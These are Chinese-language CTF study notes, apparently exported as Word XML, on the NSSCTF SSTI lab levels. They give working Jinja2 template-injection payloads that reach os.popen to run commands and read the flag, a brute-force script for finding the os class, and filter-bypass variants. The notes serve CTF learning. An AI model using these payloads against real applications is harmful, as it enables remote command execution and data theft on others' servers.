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笔记将针对nssctf的sstilab进行学习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245" cy="31464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Sstilab第一关：no waf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{{''.__class__.__bases__[0]}}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{{''.__class__.__bases__[0].__subclasses__()}}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{{''.__class__.__bases__[0].__subclasses__()[133].__init__.__globals__['popen']('ls').read()}}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寻找os的脚本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url="http://node1.anna.nssctf.cn:28430/level/1"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#payload={{''.__class__.__bases__[0].__subclasses__()[1]}}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#payload="{{''.__class__.__bases__.__getitem__(0).__subclasses__().__getitem__("+str(i)+"}}"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range(500):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payload = {"code":"{{''.__class__.__bases__[0].__subclasses__()["+str(i)+"]}}"}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#print(payload)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res=requests.post(url=url,data=payload)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#print(res.text)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"os" in res.text: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print(res.text)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print(payload)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268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第二关：过滤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tabs>
          <w:tab w:val="left" w:pos="245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 %}属于flask的控制语句，且以{%end...%}结尾</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="245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例如定义girls=[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小李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小王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小郭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小苗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小秦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tabs>
          <w:tab w:val="left" w:pos="245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然后在渲染的html文件里这样写</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="245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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF000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girl </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> girls %}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="245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&lt;li&gt;{{girl}}&lt;li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2457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 end</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24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%}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所以可以用%代替‘{’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6484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但是问题是只使用{%%}并不回显，因此我们使用print语句把内容打印出来。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{%print('abc'.__class__.__bases__[0].__subclasses__()[133].__init__.__globals__['popen']('cat /app/flag').read())%}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267960" cy="16529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第三关：无回显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方式：反弹shell，带外注入，纯盲注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第四关：过滤中括号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cs="Calibri Light"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>使用函数getitem绕过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cs="Calibri Light"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>原本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{{''.__class__.__bases__</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>[0]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.__subclasses__()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>[133]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.__init__.__globals__</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>['popen']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('ls').read()}}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eastAsia" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>变化为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24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pP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{{''.__class__.__bases__.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>__getitem__(0)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.__subclasses__().</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>__getitem__(133)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
          <w:rFonts w:hint="default" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>__init__</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
          <w:rFonts w:hint="default" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>__globals__</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
          <w:rFonts w:hint="default" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>__getitem__</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>('popen')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>('ls').</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
          <w:rFonts w:hint="default" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>read</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>()}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>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第五关：过滤单双引号（建议使用chorme的hackbar进行渗透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Request在flask可以访问基于HTTP请求传递的所有信息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Request.args.key get传入key的值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Request.values.x1 所有参数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Request.cookies 获取cookie传入的参数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Request.headers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Request.form.key 获取post传入参数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Request.data 获取post传入参数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Request.json 获取post传入json参数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使用get方法：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5264785" cy="2498725"/>
            <wp:effectExtent l="0" t="0" r="571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{{abc.__class__.__bases__[0].__subclasses__()[133].__init__.__globals__[request.args.key1](request.args.key2).read()}}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Url拼接：?key1=popen&amp;&amp;key2=ls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使用post方法：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5250180" cy="2244725"/>
            <wp:effectExtent l="0" t="0" r="762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Paylaod：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code={{abc.__class__.__bases__[0].__subclasses__()[133].__init__.__globals__[request.form.key1](request.form.key2).read()}}&amp;key1=popen&amp;key2=ls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第六关：过滤下划线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方法一：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利用\x5f替代下划线，并且加上[]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{{''["\x5f\x5fclass\x5f\x5f"]["\x5f\x5fbases\x5f\x5f"][0]["\x5f\x5fsubclasses\x5f\x5f"]()[133]["\x5f\x5finit\x5f\x5f"]["\x5f\x5fglobals\x5f\x5f"]['popen']('ls').read()}}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方法二：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使用flask常用过滤器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注：过滤器通常用管道符与变量连接，且括号中可能有可选参数{{gilrs|length}}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Length：返回长度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Attr：获取对象的属性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因此可以构造{{()|attr(request.args.class)}}并且get传参class=__class__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需要注意两个点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payload不允许出现中括号，需要用getitem函数绕过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Payload不允许出现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,因此例如.read()===&gt;|attr(read)()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267325" cy="2319655"/>
            <wp:effectExtent l="0" t="0" r="317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最终payload：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{{''|attr(request.args.class)|attr(request.args.base)|attr(request.args.subclasses)()|attr(request.args.getitem)(133)|attr(request.args.init)|attr(request.args.globals)|attr(request.args.getitem)('popen')('ls')|attr('read')()}}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?class=__class__&amp;&amp;base=__base__&amp;&amp;subclasses=__subclasses__&amp;&amp;getitem=__getitem__&amp;&amp;init=__init__&amp;&amp;globals=__globals__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第七关：过滤小数点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中括号执行：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{{''['__class__']['__bases__'][0]['__subclasses__']()[133]['__init__']['__globals__']['popen']('ls')['read']()}}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第八关：关键字过滤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661160"/>
            <wp:effectExtent l="0" t="0" r="190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方法一：加号拼接：__class__=[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__cl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ass__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注：加号拼接也需要无小数点用中括号括住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Payload：{{''['__cla'+'ss__']['__ba'+'ses__'][0]['__subcla'+'sses__']()[133]['__in'+'it__']['__glo'+'bals__']['po'+'pen']('ls').read()}}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方法二：字符编码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Calibri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例如被过滤掉__class__关键词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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>{{[].__getattribute__('X19jbGFzc19f'.decode('base64'))}}</w:t>
      </w:r>
    </w:p>
    <w:p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注：试过，好像不太行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方法三：{%set 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__cla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%}{%set b=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ss__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%}{{a~b}}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E79B8"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="BF3E79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715243d0-8d53-46f3-a1b7-809c884161fa"/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00000000"/>
    <w:rsid w:val="00930024"/>
    <w:rsid w:val="030B6598"/>
    <w:rsid w:val="047F2C29"/>
    <w:rsid w:val="04FD705A"/>
    <w:rsid w:val="06821DF9"/>
    <w:rsid w:val="06FE0E84"/>
    <w:rsid w:val="07153E89"/>
    <w:rsid w:val="07B30365"/>
    <w:rsid w:val="07ED2710"/>
    <w:rsid w:val="08901A19"/>
    <w:rsid w:val="08EB30F3"/>
    <w:rsid w:val="0A4C5E14"/>
    <w:rsid w:val="0AFB5750"/>
    <w:rsid w:val="0B4335DC"/>
    <w:rsid w:val="0C375591"/>
    <w:rsid w:val="0CA9295B"/>
    <w:rsid w:val="0F703BBA"/>
    <w:rsid w:val="134E220B"/>
    <w:rsid w:val="14DD4B6B"/>
    <w:rsid w:val="15483698"/>
    <w:rsid w:val="15673B02"/>
    <w:rsid w:val="17427A08"/>
    <w:rsid w:val="175B41B4"/>
    <w:rsid w:val="17B41097"/>
    <w:rsid w:val="1D631052"/>
    <w:rsid w:val="1EEB701F"/>
    <w:rsid w:val="1F777037"/>
    <w:rsid w:val="21731A80"/>
    <w:rsid w:val="218E4DA0"/>
    <w:rsid w:val="22804455"/>
    <w:rsid w:val="24E767FE"/>
    <w:rsid w:val="25496D80"/>
    <w:rsid w:val="2584425C"/>
    <w:rsid w:val="27433CA3"/>
    <w:rsid w:val="299C2732"/>
    <w:rsid w:val="2BAF19FD"/>
    <w:rsid w:val="2D990AC0"/>
    <w:rsid w:val="2E2653A5"/>
    <w:rsid w:val="2ED81174"/>
    <w:rsid w:val="2FA23C5C"/>
    <w:rsid w:val="32C1639E"/>
    <w:rsid w:val="339E0BDF"/>
    <w:rsid w:val="33BC7C74"/>
    <w:rsid w:val="33F151B2"/>
    <w:rsid w:val="347965F6"/>
    <w:rsid w:val="350E2AE2"/>
    <w:rsid w:val="3515343B"/>
    <w:rsid w:val="35853D26"/>
    <w:rsid w:val="359027A9"/>
    <w:rsid w:val="35B30245"/>
    <w:rsid w:val="380D6333"/>
    <w:rsid w:val="3A08503E"/>
    <w:rsid w:val="3AE2041B"/>
    <w:rsid w:val="3B0C72A0"/>
    <w:rsid w:val="3C6D21B9"/>
    <w:rsid w:val="3D6F0EF6"/>
    <w:rsid w:val="3D976F39"/>
    <w:rsid w:val="3E063608"/>
    <w:rsid w:val="406B1E48"/>
    <w:rsid w:val="443B7D84"/>
    <w:rsid w:val="453F5652"/>
    <w:rsid w:val="47E36768"/>
    <w:rsid w:val="485338EE"/>
    <w:rsid w:val="48FD7CFE"/>
    <w:rsid w:val="4A037596"/>
    <w:rsid w:val="4A1B49FB"/>
    <w:rsid w:val="4ADD1B10"/>
    <w:rsid w:val="4B5160DF"/>
    <w:rsid w:val="4BEA0FB4"/>
    <w:rsid w:val="4F590DA3"/>
    <w:rsid w:val="50577CF3"/>
    <w:rsid w:val="50EA0B67"/>
    <w:rsid w:val="50ED0658"/>
    <w:rsid w:val="51F52E38"/>
    <w:rsid w:val="52126D54"/>
    <w:rsid w:val="53A72D40"/>
    <w:rsid w:val="570E3D9B"/>
    <w:rsid w:val="57F76E7D"/>
    <w:rsid w:val="5ADF240B"/>
    <w:rsid w:val="5BB57FC4"/>
    <w:rsid w:val="5E0E21A1"/>
    <w:rsid w:val="5E415585"/>
    <w:rsid w:val="5EAD3E4A"/>
    <w:rsid w:val="5FEF7F48"/>
    <w:rsid w:val="61EF4230"/>
    <w:rsid w:val="62511752"/>
    <w:rsid w:val="62AD13B7"/>
    <w:rsid w:val="63AF4C4C"/>
    <w:rsid w:val="64682077"/>
    <w:rsid w:val="648C6E04"/>
    <w:rsid w:val="64F8227D"/>
    <w:rsid w:val="659A0956"/>
    <w:rsid w:val="65F00576"/>
    <w:rsid w:val="669C24AC"/>
    <w:rsid w:val="672E75A8"/>
    <w:rsid w:val="674F571E"/>
    <w:rsid w:val="686E097E"/>
    <w:rsid w:val="6893750B"/>
    <w:rsid w:val="69440F18"/>
    <w:rsid w:val="6B2F38EF"/>
    <w:rsid w:val="6BC009EB"/>
    <w:rsid w:val="6C172D01"/>
    <w:rsid w:val="6D6C2BD8"/>
    <w:rsid w:val="6EAD34A8"/>
    <w:rsid w:val="6EE33335"/>
    <w:rsid w:val="6FD26F3F"/>
    <w:rsid w:val="70C7747B"/>
    <w:rsid w:val="71455C51"/>
    <w:rsid w:val="73040DDE"/>
    <w:rsid w:val="74EE481B"/>
    <w:rsid w:val="75790588"/>
    <w:rsid w:val="77972F48"/>
    <w:rsid w:val="77F94D56"/>
    <w:rsid w:val="78D6184E"/>
    <w:rsid w:val="78F14032"/>
    <w:rsid w:val="79ED43D4"/>
    <w:rsid w:val="7B3D7962"/>
    <w:rsid w:val="7C920181"/>
    <w:rsid w:val="7D937D0D"/>
    <w:rsid w:val="7DC3714D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536</Words>
  <Characters>2981</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>62</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>3043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2024-05-18T09:02:00Z</dcterms:created>
  <dc:creator>0629</dc:creator>
  <cp:lastModifiedBy>【】</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-05-19T05:56:21Z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ED9C9DE411B44FB28BA780C21676BFD5</vt:lpwstr>
  </property>
</Properties>
</file>